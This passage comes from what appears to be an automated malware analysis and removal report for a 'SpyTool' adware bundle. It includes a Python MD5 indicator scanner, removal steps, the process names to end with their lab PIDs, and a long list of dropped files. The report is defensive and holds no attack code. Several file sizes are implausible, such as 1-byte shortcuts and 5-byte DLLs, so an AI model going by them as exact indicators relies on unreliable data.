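    iocs: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        cells = [c.strip() for c in raw.strip().strip("|").split("|")]
        if len(cells) < 2:
            continue
        digest, path = cells[0].lower(), cells[1]
        if not HEX32.fullmatch(digest):
            continue
        iocs.setdefault(digest, []).append(path)
    return iocs


def md5_of_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file so large browser bundles (chrome.7z etc.) fit in
    memory.  MD5 is used only because that is what the report publishes."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root: str, iocs: Dict[str, List[str]]) -> List[Tuple[str, str, List[str]]]:
    """Return (found_path, md5, reported_paths) for each matching file under
    root.  Files that vanish or cannot be read mid-scan are skipped."""
    hits: List[Tuple[str, str, List[str]]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                digest = md5_of_file(full)
            except OSError:
                continue
            if digest in iocs:
                hits.append((full, digest, iocs[digest]))
    return hits


def demo_scan() -> List[Tuple[str, str, List[str]]]:
    """Run scan_tree over a constructed tree: one marker file whose MD5 is
    added to the index as a constructed indicator, one unrelated file."""
    iocs = parse_dropped_table(SAMPLE_TABLE)
    with tempfile.TemporaryDirectory() as root:
        marker = os.path.join(root, "Local Settings", "Temp", "nsq99.tmp")
        os.makedirs(os.path.dirname(marker))
        with open(marker, "wb") as fh:
            fh.write(b"constructed marker bytes, not a real sample")
        with open(os.path.join(root, "clean.bin"), "wb") as fh:
            fh.write(b"unrelated bytes")
        iocs.setdefault(md5_of_file(marker), []).append("constructed marker")
        return scan_tree(root, iocs)


if __name__ == "__main__":
    for found, digest, reported in demo_scan():
        print(found, digest, reported)
```

On a real host, call `scan_tree` with the user's profile and `%Program Files%` as roots and the full table as input; a hit on a hash that the table lists under a Content.IE5 name tells you which download produced the file even when the temp name has changed.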
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager); the number after each colon is the PID observed in the analysis run and will differ on an infected machine, so match on the process name:
nsb27.tmp:1920
nst20.tmp:1040
nsh37.tmp:1376
nss2A.tmp:1600
nss2A.tmp:228
gmsd_re_005010082.exe:436
tasklist.exe:1920
tasklist.exe:1068
setup.exe:268
nsn4.tmp:224
taskkill.exe:484
taskkill.exe:220
wmic.exe:1524
amisid.exe:224
amisid.exe:1228
nsp1D.tmp:1376
%original file name%.exe:1704
nsd3C.tmp:1776
nsd3C.tmp:848
2835.exe:792
encrypt.exe:644
encrypt.exe:1796
encrypt.exe:1900
encrypt.exe:1484
upgmsd_re_005010082.exe:380
nsd33.tmp:432
nskA.tmp:1676
nsc14.tmp:1452
- Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2A.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\checks.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[2].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3A.tmp (6012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn47.tmp (102710 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[2].exe (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (3413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz48.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2D.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\gmsd_re_005010082\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1B.tmp (7695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj7.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2835.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (9771 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp\nsd3C.tmp (3779 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-73DD7.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-QHO3I.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-F8943.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-FI91J.tmp (15278 bytes)
%Program Files%\gmsd_re_005010082\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-OHVJR.tmp (7433 bytes)
%Program Files%\gmsd_re_005010082\unins000.dat (29081 bytes)
%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.7z (15278 bytes)
%Program Files%\gmsd_re_005010082\is-SLOUM.tmp (22284 bytes)
%Program Files%\gmsd_re_005010082\predm.exe (2321 bytes)
%Program Files%\gmsd_re_005010082\gamesdesktop_widget.exe (77294 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\chrome.packed.7z (1424068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\agoda.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282\DD109E04-9249-4175-ABE-CCF37DDE4282.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\9gag.ico (1913 bytes)
